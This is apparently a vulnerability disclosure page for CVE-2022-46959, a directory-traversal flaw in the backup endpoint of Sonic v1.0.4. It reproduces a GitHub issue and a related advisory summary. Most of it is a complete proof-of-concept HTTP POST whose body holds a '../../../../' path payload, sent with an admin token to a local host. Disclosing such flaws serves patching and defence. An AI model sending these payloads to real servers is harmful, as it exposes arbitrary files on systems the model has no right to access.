Headline
CVE-2022-46959: Back up files in any directory through directory traversal · Issue #56 · go-sonic/sonic
An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.
Need to log in to the background
Back up files in any directory through directory traversal
POST /api/admin/backups/work-dir HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 35
Admin-Authorization: 0996683e-0fab-46ec-936d-953d43be8048
Accept: application/json, text/plain, */*
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
sec-ch-ua-platform: "Linux"
Content-Type: application/json
Origin: http://127.0.0.1:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8080/admin/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
["../../../../home/kali/Documents"]Related news
GHSA-2x48-p6cq-5xcw: Path Traversal in github.com/go-sonic/sonic
An issue in the component /admin/backups/work-dir of Sonic v1.0.4 allows attackers to execute a directory traversal.